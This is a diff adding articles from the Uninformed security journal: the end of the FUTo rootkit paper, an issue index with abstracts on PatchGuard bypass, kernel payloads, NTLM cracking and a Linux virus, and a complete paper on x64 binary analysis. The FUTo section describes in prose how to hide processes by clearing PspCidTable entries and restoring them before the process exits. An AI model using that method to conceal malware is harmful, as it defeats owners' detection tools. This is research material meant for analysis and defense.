+    USHORT NextCallback; // saved pointer to next callback frame
+    USHORT FramePointer; // saved frame pointer
+    USHORT PaeEnabled:1;
+    ULONG KiCallUserMode; // kernel routine
+    ULONG KeUserCallbackDispatcher; // address in ntdll
+
+    ULONG PsLoadedModuleList;
+    ULONG PsActiveProcessHead;
+    ULONG PspCidTable;
+
+    ULONG ExpSystemResourcesList;
+    ULONG ExpPagedPoolDescriptor;
+    ULONG ExpNumberOfPagedPools;
+
+    [...]
+
+    ULONG KdPrintCircularBuffer;
+    ULONG KdPrintCircularBufferEnd;
+    ULONG KdPrintWritePointer;
+    ULONG KdPrintRolloverCount;
+
+    ULONG MmLoadedUserImageList;
+
+} KDDEBUGGER_DATA32, *PKDDEBUGGER_DATA32;
+
+As the reader can see, the structure contains pointers to many of the
+commonly needed/used non-exported variables. This is a more robust
+method of finding the PspCidTable and other variables like it.
+
+The second design consideration was a little more troubling. When FUTo
+removes an object from the PspCidTable, the HANDLE_ENTRY is replaced
+with NULLs, representing the fact that the process "does not exist." The
+problem then occurs when the process that is hidden (and has no
+PspCidTable entries) is closed. When the system tries to close the
+process, it will index into the PspCidTable and dereference a NULL
+object, causing a blue screen. The solution to this problem is simple
+but not elegant. First, FUTo sets up a process notify routine by calling
+PsSetCreateProcessNotifyRoutine. The callback function will be invoked
+whenever a process is created, but more importantly it will be called
+whenever a process is deleted. The callback executes before the hidden
+process is terminated; therefore, it gets called before the system
+crashes. When FUTo deletes the indexes that contain objects that point
+to the rogue process, FUTo will save the value of the HANDLE_ENTRYs and
+the index for later use. When the process is closed, FUTo will restore
+the objects before the process is closed, allowing the system to
+dereference valid objects.
+
+5) Conclusion
+
+The catch phrase in 2005 was, ``We are raising the bar [again] for
+rootkit detection''. Hopefully the reader has walked away with a better
+understanding of how the top rootkit detection programs are detecting
+hidden processes and how they can be improved. Some readers may ask,
+"What can I do?" Well, the simple solution is not to connect to the
+Internet, but using a combination of Blacklight, IceSword, and Rootkit
+Revealer will greatly improve your chances of staying rootkit free.
+A new tool called RAIDE (Rootkit Analysis Identification Elimination)
+will be unveiled in the coming months at Blackhat Amsterdam. This new
+tool does not suffer from the problems brought forth here.
+
+Bibliography
+
+Blacklight Homepage. F-Secure Blacklight.
+http://www.f-secure.com/blacklight/
+
+FU Project Page. FU.
+http://www.rootkit.com/project.php?id=12
+
+IceSword Homepage. IceSword.
+http://www.xfocus.net/tools/200505/1032.html
+
+LordPE Homepage. LordPE Info.
+http://mitglied.lycos.de/yoda2k/LordPE/info.htm
+
+Opc0de. 2005. How to get some hidden kernel variables without scanning.
+http://www.rootkit.com/newsread.php?newsid=101
+
+Rohitab's API Monitor. API Monitor - Spy on API calls.
+http://www.rohitab.com/apimonitor/
+
+Russinovich, Solomon. Microsoft Windows Internals, Fourth Edition.
+
+Silberman. RAIDE: Rootkit Analysis Identification Elimination.
+http://www.blackhat.com/html/bh-europe-06/bh-eu-06-speakers.html
diff --git a/uninformed/3.txt b/uninformed/3.txt
new file mode 100644
index 0000000..5f583b7
--- /dev/null
+++ b/uninformed/3.txt
@@ -0,0 +1,35 @@
+Engineering in Reverse
+Bypassing PatchGuard on Windows x64
+skape & Skywing
+The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors from modifying certain critical operating system structures. These structures include things like specific system images, the SSDT, the IDT, the GDT, and certain critical processor MSRs. This feature is intended to ensure kernel stability by preventing uncondoned behavior, such as hooking. However, it also has the side effect of preventing legitimate products from working properly. For that reason, this paper will serve as an in-depth analysis of PatchGuard's inner workings with an eye toward techniques that can be used to bypass it. Possible solutions will also be proposed for the bypass techniques that are suggested.
+pdf | txt | html
+
+Exploitation Technology
+Windows Kernel-mode Payload Fundamentals
+bugcheck & skape
+This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows.
+pdf | txt | html
+
+Fuzzing
+Analyzing Common Binary Parser Mistakes
+Orlando Padilla
+With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it all is unfortunate; no one cares enough. These bugs have been around for some time now, but have only recently gained media attention due to the large number of vulnerabilities being released. Researchers have been finding more elaborate and passive attack vectors for these bugs, some of which can even leverage a remote compromise.
+pdf | txt | code.tgz | html
+
+General Research
+Attacking NTLM with Precomputed Hashtables
+Warlord
+Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with Microsoft's Windows being no exception. Due to errors in the design of the password encryption scheme, especially in the LanMan (LM) scheme, Windows has a bad track record in this field of information security. Especially in the last couple of years, the outdated DES encryption algorithm that LanMan is based on has faced more and more processing power in the average household, which, combined with ever-increasing hard disk sizes, has made it crystal clear that LanMan nowadays is not just outdated, but even antiquated.
+pdf | txt | html
+
+Linux Improvised Userland Scheduler Virus
+Izik
+This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to invading other processes, and the userland scheduler provides a way to make the injected code coexist with the original process code. This allows the virus to remain stealthy and active inside an infected process.
+pdf | txt | html
+
+Rootkit Technology
+FUTo
+Peter Silberman & C.H.A.O.S.
+Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms used by rootkit detectors, such as BlackLight, attempt to find what the rootkit is hiding instead of simply detecting the presence of the rootkit's hooks. This paper will discuss an algorithm that is used by both Blacklight and IceSword to detect hidden processes. This paper will also document current weaknesses in the rootkit detection field and introduce a more complete stealth technique implemented as a prototype in FUTo.
+pdf | txt | code.tgz | html
+
diff --git a/uninformed/4.4.txt b/uninformed/4.4.txt
new file mode 100644
index 0000000..9f0b862
--- /dev/null
+++ b/uninformed/4.4.txt
@@ -0,0 +1,686 @@
+Improving Automated Analysis of Windows x64 Binaries
+April 2006
+skape
+mmiller@hick.org
+
+
+1) Foreword
+
+Abstract: As Windows x64 becomes a more prominent platform, it will
+become necessary to develop techniques that improve the binary analysis
+process. In particular, automated techniques that can be performed
+prior to doing code or data flow analysis can be useful in getting a
+better understanding for how a binary operates. To that point, this
+paper gives a brief explanation of some of the changes that have been
+made to support Windows x64 binaries. From there, a few basic
+techniques are illustrated that can be used to improve the process of
+identifying functions, annotating their stack frames, and describing
+their exception handler relationships. Source code to an example IDA
+plugin is also included that shows how these techniques can be
+implemented.
+
+Thanks: The author would like to thank bugcheck, sh0k, jt, spoonm, and
+Skywing.
+
+Update: The article in MSDN magazine by Matt Pietrek was
+published after this article was written. However, it contains a
+lot of useful information and touches on many of the same topics
+that this article covers in the background chapter. The article can
+be found here:
+http://msdn.microsoft.com/msdnmag/issues/06/05/x64/default.aspx.
+
+With that, on with the show...
+
+
+2) Introduction
+
+The demand for techniques that can be used to improve the analysis
+process of Windows x64 binaries will only increase as the Windows x64
+platform becomes more accepted and used in the marketplace. There is a
+deluge of useful information surrounding techniques that can be used to
+perform code and data flow analysis that is also applicable to the x64
+architecture. However, techniques that can be used to better annotate
+and streamline the initial analysis phases, such as identifying
+functions and describing their stack frames, are still a ripe area for
+improvement at the time of this writing. For that reason, this paper
+will start by describing some of the changes that have been made to
+support Windows x64 binaries.
This background information is useful +because it serves as a basis for understanding a few basic techniques +that may be used to improve some of the initial analysis phases. During +the course of this paper, the term Windows x64 binary will simply be +reduced to x64 binary in the interest of brevity. + + +3) Background + +Prior to diving into some of the analysis techniques that can be +performed on x64 binaries, it's first necessary to learn a bit about +some of the changes that were made to support the x64 architecture. +This chapter will give a very brief explanation of some of the things +that have been introduced, but will by no means attempt to act as an +authoritative reference. + + +3.1) PE32+ Image File Format + +The image file format for the x64 platform is known as PE32+. As one +would expect, the file format is derived from the PE file format with +only very slight modifications. For instance, 64-bit binaries contain +an IMAGE_OPTIONAL_HEADER64 rather than an IMAGE_OPTIONAL_HEADER. The +differences between these two structures are described in the table +below: + + Field | PE | PE32+ + -------------------+-------+------------------------------ + BaseOfData | ULONG | Removed from structure + ImageBase | ULONG | ULONGLONG + SizeOfStackReserve | ULONG | ULONGLONG + SizeOfStackCommit | ULONG | ULONGLONG + SizeOfHeapReserve | ULONG | ULONGLONG + SizeOfHeapCommit | ULONG | ULONGLONG + -------------------+-------+------------------------------ + +In general, any structure attribute in the PE image that made reference +to a 32-bit virtual address directly rather than through an RVA (Relative +Virtual Address) has been expanded to a 64-bit attribute in PE32+. Other +examples of this include the IMAGE_TLS_DIRECTORY structure and the +IMAGE_LOAD_CONFIG_DIRECTORY structure. + +With the exception of certain field offsets in specific structures, +the PE32+ image file format is largely backward compatible with PE +both in use and in form. + + +3.2) Calling Convention + +The calling convention used on x64 is much simpler than those used for +x86. Unlike x86, where calling conventions like stdcall, cdecl, and +fastcall are found, the x64 platform has only one calling convention. +The calling convention that it uses is a derivative of fastcall where +the first four parameters of a function are passed by register and any +remaining parameters are passed through the stack. Each parameter is 64 +bits wide (8 bytes). The first four parameters are passed through the +RCX, RDX, R8, and R9 registers, respectively. For scenarios where +parameters are passed by value or are otherwise too large to fit into +one of the 64-bit registers, appropriate steps are taken as documented +in [4]. + + +3.2.1) Stack Frame Layout + +The stack frame layout for functions on x64 is very similar to x86, but +with a few key differences. Just like x86, the stack frame on x64 is +divided into three parts: parameters, return address, and locals. These +three parts are explained individually below. One of the important +principals to understand when it comes to x64 stack frames is that the +stack does not fluctuate throughout the course of a given function. In +fact, the stack pointer is only permitted to change in the context of a +function prologue. Note that things like alloca are handled in a special +manner[7]. Parameters are not pushed and popped from the stack. Instead, +stack space is pre-allocated for all of the arguments that would be +passed to child functions. 
This is done, in part, for making it easier +to unwind call stacks in the event of an exception. The table below +describes a typical stack frame: + + + +-------------------------+ + | Stack parameter area | + +-------------------------+ + | Register parameter area | + +-------------------------+ + | Return address | + +-------------------------+ + | Locals | + +-------------------------+ + + +== Parameters + + +The calling convention for functions on x64 dictates that the first four +parameters are passed via register with any remaining parameters, +starting with parameter five, spilling to the stack. Given that the +fifth parameter is the first parameter passed by the stack, one would +think that the fifth parameter would be the value immediately adjacent +to the return address on the stack, but this is not the case. Instead, +if a given function calls other functions, that function is required to +allocate stack space for the parameters that are passed by register. +This has the affect of making it such that the area of the stack +immediately adjacent to the return address is 0x20 bytes of +uninitialized storage for the parameters passed by register followed +immediately by any parameters that spill to the stack (starting with +parameter five). The area of storage allocated on the stack for the +register parameters is known as the register parameter area whereas the +area of the stack for parameters that spill onto the stack is known as +the stack parameter area. The table below illustrates what the +parameter portion of a stack frame would look like after making a call +to a function: + + +-------------------------+ + | Parameter 6 | + +-------------------------+ + | Parameter 5 | + +-------------------------+ + | Parameter 4 (R9 Home) | + +-------------------------+ + | Parameter 3 (R8 Home) | + +-------------------------+ + | Parameter 2 (RDX Home) | + +-------------------------+ + | Parameter 1 (RCX Home) | + +-------------------------+ + | Return address | + +-------------------------+ + + +To emphasize further, the register parameter area is always allocated, +even if the function being called has fewer than four arguments. This +area of the stack is effectively owned by the called function, and as +such can be used for volatile storage during the course of the function +call. In particular, this area is commonly used to persist the values +of register parameters. This area is also referred to as the ``home'' +address for register parameters. However, it can also be used to save +non-volatile registers. To someone familiar with x86 it may seem +slightly odd to see functions modifying areas of the stack beyond the +return address. The key is to remember that the 0x20 bytes immediately +adjacent to the return address are owned by the called function. One +important side affect of this requirement is that if a function calls +other functions, the calling function's minimum stack allocation will be +0x20 bytes. This accounts for the register parameter area that will be +used by called functions. + +The obvious question to ask at this point is why it's the caller's +responsibility to allocate stack space for use by the called function. +There are a few different reasons for this. Perhaps most importantly, +it makes it possible for the called function to take the address of a +parameter that's passed via a register. Furthermore, the address that +is returned for the parameter must be at a location that is contiguous +in relation to the other parameters. 
This is particularly necessary for +variadic functions, which require a contiguous list of parameters, but +may also be necessary for applications that make assumptions about being +able to reference parameters in relation to one another by address. +Invalidating this assumption would introduce source compatibility +problems. + +For more information on parameter passing, refer to the MSDN +documentation[4,7]. + +== Return Address + +Due to the fact that pointers are 64 bits wide on x64, the return +address location on the stack is eight bytes instead of four. + +== Locals + +The locals portion of a function's stack frame encompasses both local +variables and saved non-volatile registers. For x64, the general +purpose registers described as non-volatile are RBP, RBX, RDI, RSI, and +R12 through R15[5]. + + +3.3) Exception Handling on x64 + +On x86, exception handling is accomplished through the adding and +removing of exception registration records on a per-thread basis. When +a function is entered that makes use of an exception handler, it +constructs an exception registration record on the stack that is +composed of an exception handler (a function pointer), and a pointer to +the next element in the exception handler list. This list of exception +registration records is stored relative to fs:[0]. When an exception +occurs, the exception dispatcher walks the list of exception handlers +and calls each one, checking to see if they are capable of handling the +exception that occurred. While this approach works perfectly fine, +Microsoft realized that there were better ways to go about it. First of +all, the adding and removing of exception registration records that are +static in the context of an execution path adds needless execution +overhead. Secondly, the security implications of storing a function +pointer on the stack have been made very obvious, especially in the case +where that function pointer can be called after an exception is +generated (such as an access violation). Finally, the process of +unwinding call frames is muddled with limitations, thus making it a more +complicated process than it might otherwise need to be[6]. + +With these things in mind, Microsoft completely revamped the way +exception handling is accomplished on x64. The major changes center +around the approaches Microsoft has taken to solve the three major +deficiencies found on x86. First, Microsoft solved the execution time +overhead issue of adding and removing exception handlers by moving all +of the static exception handling information into a static location in +the binary. This location, known as the .pdata section, is described by +the PE32+'s Exception Directory. The structure of this section will be +described in the exception directory subsection. By eliminating the +need to add and remove exception handlers on the fly, Microsoft has also +eliminated the security issue found on x86 with regard to overwriting +the function pointer of an exception handler. Perhaps most importantly, +the process involved in unwinding call frames has been drastically +improved through the formalization of the frame unwinding process. This +will be discussed in the subsection on unwind information. + + +3.3.1) Exception Directory + +The Exception Directory of a PE32+ binary is used to convey the complete +list of functions that could be found in a stack frame during an unwind +operation. 
These functions are known as non-leaf functions, and they +are qualified as such if they either allocate space on the stack or call +other functions. The IMAGE_RUNTIME_FUNCTION_ENTRY data structure is used +to describe the non-leaf functions, as shown below[1]: + +typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY { + ULONG BeginAddress; + ULONG EndAddress; + ULONG UnwindInfoAddress; +} _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY; + +The BeginAddress and EndAddress attributes are RVAs that represent the +range of the non-leaf function. The UnwindInfoAddress will be discussed +in more detail in the following subsection on unwind information. The +Exception directory itself is merely an array of +IMAGE_RUNTIME_FUNCTION_ENTRY structures. When an exception occurs, the +exception dispatcher will enumerate the array of runtime function +entries until it finds the non-leaf function associated with the address +it's searching for (typically a return address). + + +3.3.2) Unwind Information + +For the purpose of unwinding call frames and dispatching exceptions, +each non-leaf function has some non-zero amount of unwind information +associated with it. This association is made through the +UnwindInfoAddress attribute of the IMAGE_RUNTIME_FUNCTION_ENTRY +structure. The UnwindInfoAddress itself is an RVA that points to an +UNWIND_INFO structure which is defined as[8]: + +typedef struct _UNWIND_INFO { + UBYTE Version : 3; + UBYTE Flags : 5; + UBYTE SizeOfProlog; + UBYTE CountOfCodes; + UBYTE FrameRegister : 4; + UBYTE FrameOffset : 4; + UNWIND_CODE UnwindCode[1]; +/* UNWIND_CODE MoreUnwindCode[((CountOfCodes + 1) & ~1) - 1]; +* union { +* OPTIONAL ULONG ExceptionHandler; +* OPTIONAL ULONG FunctionEntry; +* }; +* OPTIONAL ULONG ExceptionData[]; */ +} UNWIND_INFO, *PUNWIND_INFO; + +This structure, at a very high level, describes a non-leaf function in +terms of its prologue size and frame register usage. Furthermore, it +describes the way in which the stack is set up when the prologue for +this non-leaf function is executed. This is provided through an array +of codes as accessed through the UnwindCode array. This array is +composed of UNWIND_CODE structures which are defined as[8]: + +typedef union _UNWIND_CODE { + struct { + UBYTE CodeOffset; + UBYTE UnwindOp : 4; + UBYTE OpInfo : 4; + }; + USHORT FrameOffset; +} UNWIND_CODE, *PUNWIND_CODE; + +In order to properly unwind a frame, the exception dispatcher needs to +be aware of the amount of stack space allocated in that frame, the +locations of saved non-volatile registers, and anything else that has to +do with the stack. This information is necessary in order to be able to +restore the caller's stack frame when an unwind operation occurs. By +having the compiler keep track of this information at link time, it's +possible to emulate the unwind process by inverting the operations +described in the unwind code array for a given non-leaf function. + +Aside from conveying stack frame set up, the UNWIND_INFO structure may +also describe exception handling information, such as the exception +handler that is to be called if an exception occurs. This information +is conveyed through the ExceptionHandler and ExceptionData attributes of +the structure which exist only if the UNW_FLAGE_HANDLER flag is set in the +Flags field. + +For more details on the format and use of these structures for unwinding +as well as a complete description of the unwind process, please refer to +the MSDN documentation[2]. 
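+
+As a rough illustration of how this metadata can be consumed, the
+following sketch (not the IDA plugin included with this paper)
+enumerates the exception directory of a loaded x64 module using the
+runtime function entry layout shown earlier. The local structure name,
+the module choice, and the output format are assumptions made for the
+example; it must be built as a native 64-bit program.
+
+/*
+ * pdata-walk.c - dump the runtime function entries described by the
+ * Exception Directory of a loaded x64 module.
+ */
+#include <windows.h>
+#include <stdio.h>
+
+/* Mirrors the IMAGE_RUNTIME_FUNCTION_ENTRY layout described above. */
+typedef struct _PDATA_ENTRY {
+    ULONG BeginAddress;
+    ULONG EndAddress;
+    ULONG UnwindInfoAddress;
+} PDATA_ENTRY, *PPDATA_ENTRY;
+
+int main(void)
+{
+    ULONG_PTR base = (ULONG_PTR)GetModuleHandleA("ntdll.dll");
+    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)base;
+    PIMAGE_NT_HEADERS64 nt = (PIMAGE_NT_HEADERS64)(base + dos->e_lfanew);
+    IMAGE_DATA_DIRECTORY dir =
+        nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
+    PPDATA_ENTRY rf = (PPDATA_ENTRY)(base + dir.VirtualAddress);
+    ULONG count = dir.Size / sizeof(PDATA_ENTRY);
+    ULONG i;
+
+    /* Each entry covers a non-leaf function (or a chained portion of
+       one); all three fields are RVAs relative to the module base. */
+    for (i = 0; i < count; i++)
+        printf("non-leaf range %08lx - %08lx, unwind info at %08lx\n",
+               rf[i].BeginAddress, rf[i].EndAddress,
+               rf[i].UnwindInfoAddress);
+
+    return 0;
+}
+
+Entries whose unwind information is chained, as discussed in the next
+chapter, will typically show up in such a dump as additional ranges
+within a parent function rather than as separate function entry points.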
+ + +4) Analysis Techniques + +In order to improve the analysis of x64 binaries, it is important to try +to identify techniques that can aide in the identification or extraction +of useful information from the binary in an automated fashion. This +chapter will focus on a handful of simple techniques that can be used to +better annotate or describe the behavior of an x64 binary. These +techniques intentionally do not cover the analysis of code or data flow +operations. Such techniques are outside of the scope of this paper. + + +4.1) Exception Directory Enumeration + +Given the explanation of the Exception Directory found within PE32+ +images and its application to the exception dispatching process, it can +be seen that x64 binaries have a lot of useful meta-information stored +within them. Given that this information is just sitting there waiting +to be used, it makes sense to try to take advantage of it in ways that +make it possible to better annotate or understand an x64 binary. The +following subsections will describe different things that can be +discovered by digging deeper into the contents of the exception +directory. + + +4.1.1) Functions + +One of the most obvious uses for the information stored in the exception +directory is that it can be used to discover all of the non-leaf +functions in a binary. This is cool because it works regardless of +whether or not you actually have symbols for the binary, thus providing +an easy technique for identifying the majority of the functions in a +binary. The process taken to do this is to simply enumerate the array +of IMAGE_RUNTIME_FUNCTION_ENTRY structures stored within the exception +directory. The BeginAddress attribute of each entry marks the starting +point of a non-leaf function. There's a catch, though. Not all of the +runtime function entries are actually associated with the entry point of +a function. The fact of the matter is that entries can also be +associated with various portions of an actual function where stack +modifications are deferred until necessary. In these cases, the unwind +information associated with the runtime function entry is chained with +another runtime function entry. + +The chaining of runtime function entries is documented as being +indicated through the UNW_FLAG_CHAININFO flag in the Flags attribute of +the UNWIND_INFO structure. If this flag is set, the area of memory +immediately following the last UNWIND_CODE in the UNWIND_INFO structure +is an IMAGE_RUNTIME_FUNCTION_ENTRY structure. The UnwindInfoAddress of +this structure indicates the chained unwind information. Aside from +this, chaining can also be indicated through an undocumented flag that +is stored in the least-significant bit of the UnwindInfoAddress. If the +least-significant bit is set, then it is implied that the runtime +function entry is directly chained to the IMAGE_RUNTIME_FUNCTION_ENTRY +structure that is found at the RVA conveyed by the UnwindInfoAddress +attribute with the least significant bit masked off. The reason +chaining can be indicated in this fashion is because it is a requirement +that unwind information be four byte aligned. + +With chaining in mind, it is safe to assume that a runtime function +entry is associated with the entry point of a function if its unwind +information is not chained. This makes it possible to deterministically +identify the entry point of all of the non-leaf functions. 
From there, +it should be possible to identify all of the leaf functions through +calls that are made to them by non-leaf functions. This requires code +flow analysis, though. + + +4.1.2) Stack Frame Annotation + +The unwind information associated with each non-leaf function +contains lots of useful meta-information about the structure of the +stack. It provides information about the amount of stack space +allocated, the location of saved non-volatile registers, and whether or +not a frame register is used and what relation it has to the rest of the +stack. This information is also described in terms of the location of +the instruction that actually performs the operation associated with the +task. Take the following unwind information obtained through dumpbin +/unwindinfo as an example: + + + 0000060C 00006E50 00006FF0 000081FC _resetstkoflw + Unwind version: 1 + Unwind flags: None + Size of prologue: 0x47 + Count of codes: 18 + Frame register: rbp + Frame offset: 0x20 + Unwind codes: + 3C: SAVE_NONVOL, register=r15 offset=0x98 + 38: SAVE_NONVOL, register=r14 offset=0xA0 + 31: SAVE_NONVOL, register=r13 offset=0xA8 + 2A: SAVE_NONVOL, register=r12 offset=0xD8 + 23: SAVE_NONVOL, register=rdi offset=0xD0 + 1C: SAVE_NONVOL, register=rsi offset=0xC8 + 15: SAVE_NONVOL, register=rbx offset=0xC0 + 0E: SET_FPREG, register=rbp, offset=0x20 + 09: ALLOC_LARGE, size=0xB0 + 02: PUSH_NONVOL, register=rbp + + +First and foremost, one can immediately see that the size of the +prologue used in the resetstkoflw function is 0x47 bytes. This prologue +accounts for all of the operations described in the unwind codes array. +Furthermore, one can also tell that the function uses a frame pointer, +as conveyed through rbp, and that the frame pointer offset is 0x20 bytes +relative to the current stack pointer at the time the frame pointer +register is established. + +As one would expect with an unwind operation, the unwind codes +themselves are stored in the opposite order of which they are executed. +This is necessary because of the effect on the stack each unwind code +can have. If they are processed in the wrong order, then the unwind +operation will get invalid data. For example, the value obtained +through a pop rbp instruction will differ depending on whether or not it +is done before or after an add rsp, 0xb0. + +For the purposes of annotation, however, the important thing to keep in +mind is how all of the useful information can be extracted. In this +case, it is possible to take all of the information the unwind codes +provide and break it down into a definition of the stack frame layout +for a function. This can be accomplished by processing the unwind codes +in the order that they would be executed rather than the order that they +appear in the array. There's one important thing to keep in mind when +doing this. Since unwind information can be chained, it is a +requirement that the full chain of unwind codes be processed in +execution order. This can be accomplished by walking the chain of +unwind information and building an execution order list of all of the +unwind codes. + +Once the execution order list of unwind codes is collected, the next +step is to simply enumerate each code, checking to see what operation it +performs and building out the stack frame across each iteration. Prior +to enumerating each code, the state of the stack pointer should be +initialized to 0 to indicate an empty stack frame. As data is allocated +on the stack, the stack pointer should be adjusted by the appropriate +amount. 
The actions that need to be taken for each unwind operation
+that directly affect the stack pointer are described below.
+
+  1. UWOP_PUSH_NONVOL
+
+     When a non-volatile register is pushed onto the stack, such as
+     through a push rbp, the current stack pointer needs to be
+     decremented by 8 bytes.
+
+  2. UWOP_ALLOC_LARGE and UWOP_ALLOC_SMALL
+
+     When stack space is allocated, the current stack pointer needs to
+     be adjusted by the amount indicated.
+
+  3. UWOP_SET_FPREG
+
+     When a frame pointer is defined, its offset relative to the base of
+     the stack should be saved using the current value of the stack
+     pointer.
+
+
+As the enumeration of the unwind codes occurs, it is also possible to
+annotate the different locations on the stack where non-volatile
+registers are preserved. For instance, given the example unwind
+information above, it is known that the R15 register is preserved at
+[rsp + 0x98]. Therefore, we can annotate this location as [rsp + SavedR15].
+
+Beyond annotating preserved register locations on the stack, we can also
+annotate the instructions that perform operations that affect the stack.
+For instance, when a non-volatile register is pushed, such as through
+push rbp, we can annotate the instruction that performs that operation
+as preserving rbp on the stack. The location of the instruction that's
+associated with the operation can be determined by taking the
+BeginAddress associated with the unwind information and adding it to the
+CodeOffset attribute of the UNWIND_CODE that is being processed. It is
+important to note, however, that the CodeOffset attribute actually
+points to the first byte of the instruction immediately following the
+one that performs the actual operation, so it is necessary to back track
+in order to determine the start of the instruction that actually
+performs the operation.
+
+As a result of this analysis, one can take the prologue of the
+resetstkoflw function and automatically convert it from:
+
+.text:100006E50 push rbp
+.text:100006E52 sub rsp, 0B0h
+.text:100006E59 lea rbp, [rsp+0B0h+var_90]
+.text:100006E5E mov [rbp+0A0h], rbx
+.text:100006E65 mov [rbp+0A8h], rsi
+.text:100006E6C mov [rbp+0B0h], rdi
+.text:100006E73 mov [rbp+0B8h], r12
+.text:100006E7A mov [rbp+88h], r13
+.text:100006E81 mov [rbp+80h], r14
+.text:100006E88 mov [rbp+78h], r15
+
+
+to a version with better annotation:
+
+
+.text:100006E50 push rbp ; SavedRBP
+.text:100006E52 sub rsp, 0B0h
+.text:100006E59 lea rbp, [rsp+20h]
+.text:100006E5E mov [rbp+0A0h], rbx ; SavedRBX
+.text:100006E65 mov [rbp+98h+SavedRSI], rsi ; SavedRSI
+.text:100006E6C mov [rbp+98h+SavedRDI], rdi ; SavedRDI
+.text:100006E73 mov [rbp+98h+SavedR12], r12 ; SavedR12
+.text:100006E7A mov [rbp+98h+SavedR13], r13 ; SavedR13
+.text:100006E81 mov [rbp+98h+SavedR14], r14 ; SavedR14
+.text:100006E88 mov [rbp+98h+SavedR15], r15 ; SavedR15
+
+
+While such annotation may not be entirely useful to understanding
+the behavior of the binary, it at least simplifies the process of
+understanding the layout of the stack.
+
+
+4.1.3) Exception Handlers
+
+The unwind information structure for a non-leaf function also contains
+useful information about the way in which exceptions within that
+function should be dispatched. If the unwind information associated
+with a function has the UNW_FLAG_EHANDLER or UNW_FLAG_UHANDLER flag set,
+then the function has an exception handler associated with it. The
+exception handler is conveyed through the ExceptionHandler attribute
+which comes immediately after the array of unwind codes.
This handler is +defined as being a language-specific handler for processing the +exception. More specifically, the exception handler is specific to the +semantics associated with a given programming language, such as C or +C++[3]. For C, the language-specific exception handler is named +__C_specific_handler. + +Given that all C functions that handle exceptions will have the same +exception handler, how does the function-specific code for handling an +exception actually get called? For the case of C functions, the +function-specific exception handler is stored in a scope table in the +ExceptionData portion of the UNWIND_INFO structure. Other languages may +have a different ExceptionData definition. This C scope table is defined +by the structures shown below: + +typedef struct _C_SCOPE_TABLE_ENTRY { + ULONG Begin; + ULONG End; + ULONG Handler; + ULONG Target; +} C_SCOPE_TABLE_ENTRY, *PC_SCOPE_TABLE_ENTRY; + +typedef struct _C_SCOPE_TABLE { + ULONG NumEntries; + C_SCOPE_TABLE_ENTRY Table[1]; +} C_SCOPE_TABLE, *PC_SCOPE_TABLE; + +The scope table entries describe the function-specific exception +handlers in relation to the specific areas of the function that they +apply to. Each of the attributes of the C_SCOPE_TABLE_ENTRY is expressed +as an RVA. The Target attribute defines the location to transfer +control to after the exception is handled. + +The reason why all of the exception handler information is useful is +because it makes it possible to annotate a function in terms of what +exception handlers may be called during its execution. It also makes it +possible to identify the exception handler functions that may otherwise +not be found due to the fact that they are executed indirectly. For +example, the function CcAcquireByteRangeForWrite in ntoskrnl.exe can be +annotated in the following fashion: + + +.text:0000000000434520 ; Exception handler: __C_specific_handler +.text:0000000000434520 ; Language specific handler: sub_4C7F30 +.text:0000000000434520 +.text:0000000000434520 CcAcquireByteRangeForWrite proc near + + +4.2) Register Parameter Area Annotation + +Given the requirement that the register parameter area be allocated on +the stack in the context of a function that calls other functions, it is +possible to statically annotate specific portions of the stack frame for +a function as being the location of the caller's register parameter +area. Furthermore, the location of a given function's register +parameter area that is to be used by called functions can also be +annotated. + +The location of the register parameter area is always at a fixed +location in a stack frame. Specifically, it immediately follows the +return address on the stack. If annotations are added for CallerRCX at +offset 0x8, CallerRDX at offset 0x10, CallerR8 at offset 0x18, and +CallerR9 at offset 0x20, it is possible to get a better view of the +stack frame for a given function. It also makes it easier to understand +when and how this region of the stack is used by a function. For +instance, the CcAcquireByteRangeForWrite function in ntoskrnl.exe makes +use of this area to store the values of the first four parameters: + + +.text:0000000000434520 mov [rsp+CallerR9], r9 +.text:0000000000434525 mov dword ptr [rsp+CallerR8], r8d +.text:000000000043452A mov [rsp+CallerRDX], rdx +.text:000000000043452F mov [rsp+CallerRCX], rcx + + +5) Conclusion + +This paper has presented a few basic approaches that can be used to +extract useful information from an x64 binary for the purpose of +analysis. 
By analyzing the unwind information associated with +functions, it is possible to get a better understanding for how a +function's stack frame is laid out. Furthermore, the unwind information +makes it possible to describe the relationship between a function and +its exception handler(s). Looking toward the future, x64 is likely to +become the standard architecture given Microsoft's adoption of it as +their primary architecture. With this in mind, coming up with +techniques to better automate the binary analysis process will become +more necessary. + + +Bibliography + +[1] Microsoft Corporation. ntimage.h. + 3790 DDK header files. + +[2] Microsoft Corporation. Exception Handling (x64). + http://msdn2.microsoft.com/en-us/library/1eyas8tf(VS.80).aspx; + accessed Apr 25, 2006. + +[3] Microsoft Corporation. The Language Specific Handler. + http://msdn2.microsoft.com/en-us/library/b6sf5kbd(VS.80).aspx; + accessed Apr 25, 2006. + +[4] Microsoft Corporation. Parameter Passing. + http://msdn2.microsoft.com/en-us/library/zthk2dkh.aspx; + accessed Apr 25, 2006. + +[5] Microsoft Corporation. Register Usage. + http://msdn2.microsoft.com/en-us/library/9z1stfyw(VS.80).aspx; + accessed Apr 25, 2006. + +[6] Microsoft Corporation. SEH in x86 Environments. + http://msdn2.microsoft.com/en-US/library/ms253960.aspx; + accessed Apr 25, 2006. + +[7] Microsoft Corporation. Stack 